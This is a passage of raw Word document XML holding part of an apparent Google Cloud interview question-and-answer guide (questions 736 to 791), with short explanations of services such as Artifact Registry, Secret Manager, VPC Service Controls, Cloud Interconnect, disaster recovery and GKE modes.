        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Config Connector lets teams manage GCP resources using Kubernetes custom resources. It supports GitOps-style infrastructure management through Kubernetes manifests.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Config Connector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Q736. What is Deployment Manager?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deployment Manager is GCP’s older infrastructure deployment service for creating cloud resources from templates. Many teams now prefer Terraform or Infrastructure Manager for modern IaC.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Deployment Manager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Q737. Explain Artifact Registry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Artifact Registry is GCP’s managed repository service for container images and language packages. It replaces Container Registry and supports IAM, vulnerability scanning, and regional repositories.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Artifact Registry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Q738. Explain Binary Authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Binary Authorization enforces deploy-time controls for container images on GKE and Cloud Run. It can require attestations, trusted builders, and approved images before deployment.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Binary Authorization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Q739. What is Cloud Build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Build is GCP’s managed CI/CD service for building, testing, scanning, and deploying code. It uses build steps, triggers, service accounts, and integrations with Artifact Registry and GKE.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Build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Q740. Explain Secret Manager.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secret Manager is GCP’s managed service for storing and accessing secrets securely. It supports IAM, versions, rotation workflows, audit logs, and integration with applications.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Secret Manager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Q741. What is Dataflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dataflow is GCP’s managed Apache Beam service for batch and stream data processing. It is used for ETL, real-time pipelines, and scalable data transformations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Dataflow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Q742. Explain Dataproc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dataproc is GCP’s managed service for running Spark, Hadoop, and related big data workloads. It supports ephemeral clusters, autoscaling, and integration with Cloud Storage and BigQuery.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Dataproc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Q743. What is Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Vertex AI is GCP’s unified machine learning platform for training, pipelines, feature stores, model registry, endpoints, monitoring, and generative AI workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vertex Ai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Q744. Explain Vertex AI Pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Vertex AI Pipelines orchestrates ML workflows using components and DAGs. It supports reproducible training, evaluation, model registration, and deployment automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vertex Ai Pipelines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Q745. What is AI Platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AI Platform was Google Cloud’s earlier ML platform for training and prediction. Many capabilities have been consolidated into Vertex AI.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Ai Platform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Q746. Explain TPU in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: TPUs are Google’s custom accelerators optimized for machine learning workloads. They are useful for large-scale TensorFlow, JAX, and supported deep learning training or inference jobs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>TPU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Q747. What is GPU scheduling in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GPU scheduling in GCP involves choosing GPU machine types, zones with capacity, quotas, drivers, and workload placement. In GKE, node pools, taints, tolerations, and device plugins control GPU access.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>GPU Scheduling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Q748. Explain Cloud Composer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Composer is GCP’s managed Apache Airflow service. It is used to orchestrate data pipelines, ML workflows, and scheduled operations across GCP services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Composer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Q749. What is Eventarc?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Eventarc routes events from GCP services, SaaS providers, and custom sources to targets like Cloud Run. It enables event-driven serverless architectures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Eventarc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Q750. Explain hybrid cloud with GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hybrid cloud with GCP connects on-prem infrastructure with Google Cloud using VPN, Interconnect, Anthos, identity federation, and consistent security policies. It is useful for gradual migration, compliance, or latency-sensitive systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Hybrid Cloud With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Q751. What is multi-cloud architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-cloud architecture uses services from more than one cloud provider. It can improve resilience or avoid lock-in, but increases complexity in networking, identity, observability, cost, and operations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Multi-cloud Architecture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Q752. Explain cloud cost optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud cost optimization reduces waste while preserving performance and reliability. Techniques include rightsizing, autoscaling, committed use discounts, spot VMs, storage lifecycle rules, budget alerts, and FinOps governance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Cost Optimization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Q753. What is committed use discount?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Committed use discounts provide lower prices in exchange for committing to resource usage for one or three years. They are useful for predictable workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Committed Use Discount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Q754. Explain autoscaling in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Autoscaling in GCP adjusts resources based on load or metrics. Examples include managed instance group autoscaling, GKE HPA/cluster autoscaler, Cloud Run autoscaling, and Dataflow autoscaling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Autoscaling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Q755. What is preemptible VM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A preemptible VM is a low-cost VM that can be terminated by Google at any time and has a limited lifetime. It is suitable for fault-tolerant batch jobs but not critical stateful workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Preemptible Vm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Q756. Explain spot VMs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Spot VMs are discounted Compute Engine instances that can be reclaimed by Google when capacity is needed. They are useful for flexible workloads such as batch processing, CI jobs, and ML training with checkpointing.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Spot Vms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Q757. What is cloud security posture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud security posture is the overall state of cloud security controls, misconfigurations, risks, and compliance. It is managed through inventory, policies, scanning, IAM reviews, logging, and remediation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Security Posture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Q758. Explain VPC Service Controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VPC Service Controls create security perimeters around supported GCP services to reduce data exfiltration risk. They are useful for sensitive data platforms and regulated environments.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>VPC Service Controls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Q759. What is SCC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Security Command Center is GCP’s security and risk management platform. It helps detect vulnerabilities, misconfigurations, threats, and compliance issues across cloud assets.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SCC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Q760. Explain cloud audit logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Audit Logs record administrative, data access, and system events for GCP resources. They are important for compliance, investigations, and change tracking.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Audit Logs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Q761. What is organization hierarchy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GCP organization hierarchy uses organization, folders, projects, and resources to structure ownership and policy. It supports centralized governance with delegated project-level management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Organization Hierarchy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Q762. Explain billing accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Billing accounts pay for GCP resource usage and can be linked to projects. They support budgets, cost reports, exports, labels, and billing permissions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Billing Accounts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Q763. What is quota management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Quota management controls service limits such as CPUs, API calls, IP addresses, and GPUs. Teams must monitor quotas, request increases early, and design around service limits.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Quota Management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Q764. Explain GCP networking troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GCP networking troubleshooting checks VPC routes, firewall rules, DNS, load balancer health checks, NAT, subnet ranges, service accounts, Private Google Access, and connectivity tests.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>GCP Networking Troubleshooting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Q765. What is private Google access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Private Google Access lets VMs without public IP addresses reach Google APIs and services through private networking. It is useful for secure private workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Private Google Access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Q766. Explain Cloud Interconnect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Interconnect provides dedicated private connectivity between on-prem networks and Google Cloud. It offers higher bandwidth and more predictable latency than VPN.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Interconnect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Q767. What is Cloud VPN?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud VPN securely connects GCP VPCs with on-prem or other cloud networks over IPsec tunnels. It is commonly used for hybrid connectivity and backup links.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Vpn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Q768. Explain zero trust security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Explain zero trust security. refers to an important GCP/cloud engineering concept. In an interview, explain what it does, where it fits in the architecture, how it is secured and monitored, and what tradeoffs affect cost, scalability, and reliability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Zero Trust Security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Q769. What is BeyondCorp?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: BeyondCorp is Google’s zero-trust security model where access is based on identity, device, and context rather than network location. Identity-Aware Proxy is a key GCP implementation pattern.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Beyondcorp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Q770. Explain cloud migration strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud migration strategies include rehost, replatform, refactor, repurchase, retain, and retire. The right strategy depends on business risk, architecture, cost, timeline, and operational maturity.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Migration Strategies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Q771. What is lift-and-shift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Lift-and-shift means moving an application to cloud with minimal architecture changes. It is fast but may not fully use cloud-native benefits or cost optimization.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Lift-and-shift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Q772. Explain refactoring migration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Refactoring migration changes application architecture to better use cloud-native services. It takes more effort but can improve scalability, resilience, automation, and cost efficiency.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Refactoring Migration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Q773. What is active-active architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Active-active architecture runs multiple sites or regions serving traffic at the same time. It improves availability and latency but requires careful data consistency, routing, and failover design.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Active-active Architecture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Q774. Explain DR in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DR in GCP uses backups, multi-zone or multi-region deployment, replicated data, tested runbooks, infrastructure as code, and clear RTO/RPO targets. The design depends on criticality and cost tolerance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>DR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Q775. What is backup strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A backup strategy defines what data is backed up, how often, where it is stored, how long it is retained, and how restores are tested. Backups should be encrypted, monitored, and isolated from primary failures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Backup Strategy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Q776. Explain RTO and RPO.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RTO is the maximum acceptable time to restore service after an incident. RPO is the maximum acceptable data loss window measured by time since the last recoverable copy.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Rto And Rpo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Q777. What is cloud-native design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud-native design builds applications using scalable, resilient, automated, and observable patterns such as containers, managed services, APIs, CI/CD, IaC, autoscaling, and loosely coupled services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud-native Design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Q778. Explain serverless architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Serverless architecture runs code or containers without managing servers directly. It provides automatic scaling and pay-per-use economics, but requires attention to cold starts, limits, and event-driven design.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Serverless Architecture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Q779. What is API Gateway?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An API gateway is the entry point for client requests to backend services. It handles routing, authentication, rate limiting, request transformation, observability, and sometimes caching.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>API Gateway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Q780. Explain Apigee.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Apigee is Google Cloud’s API management platform. It provides API proxies, security policies, analytics, developer portals, quotas, monetization, and lifecycle management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Apigee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Q781. What is cloud governance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud governance defines rules for secure, compliant, and cost-effective cloud usage. It includes IAM, organization policies, tagging, budgets, landing zones, security baselines, and audit processes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Governance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Q782. Explain cloud tagging standards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud tagging standards define required labels for ownership, environment, application, cost center, compliance, and lifecycle. They improve cost allocation, automation, governance, and inventory management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Tagging Standards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Q783. What is FinOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: FinOps is the practice of managing cloud cost collaboratively across engineering, finance, and business teams. It focuses on visibility, accountability, optimization, and value-based spending.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Finops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Q784. Explain cloud observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud observability collects metrics, logs, traces, events, and alerts across cloud resources and applications. It helps teams understand system behavior, detect issues, and improve reliability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Observability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Q785. What is cloud compliance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud compliance ensures cloud systems meet regulatory, contractual, and internal requirements. It includes controls for identity, encryption, logging, data residency, vulnerability management, and audit evidence.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Compliance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Q786. Explain HIPAA in cloud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HIPAA in cloud requires protecting healthcare data with controls such as encryption, access management, audit logging, breach response, vendor agreements, and secure operations. Cloud providers supply compliant services, but customers still configure them correctly.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Hipaa In Cloud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Q787. What is PCI-DSS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: PCI-DSS is a security standard for systems that store, process, or transmit payment card data. It requires strong controls for network security, encryption, access, monitoring, vulnerability management, and compliance validation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pci-dss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Q788. Explain SOC2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SOC 2 is an audit framework for controls around security, availability, processing integrity, confidentiality, and privacy. It is commonly required for SaaS and enterprise service providers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Soc2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Q789. What is cloud IAM best practice?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud IAM best practices include least privilege, group-based access, MFA, service account hygiene, no long-lived keys where possible, periodic reviews, separation of duties, and audit logging.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud IAM Best Practice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Q790. Explain GKE Autopilot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GKE Autopilot is a managed GKE mode where Google manages nodes, scaling, many security defaults, and infrastructure operations. Teams focus more on workloads and less on node management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Gke Autopilot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Q791. What is standard GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Standard GKE gives teams more control over node pools, machine types, networking, upgrades, and cluster configuration. It is useful when workloads need advanced customization.</w:t>
        <w:br/>
        <w:br/>
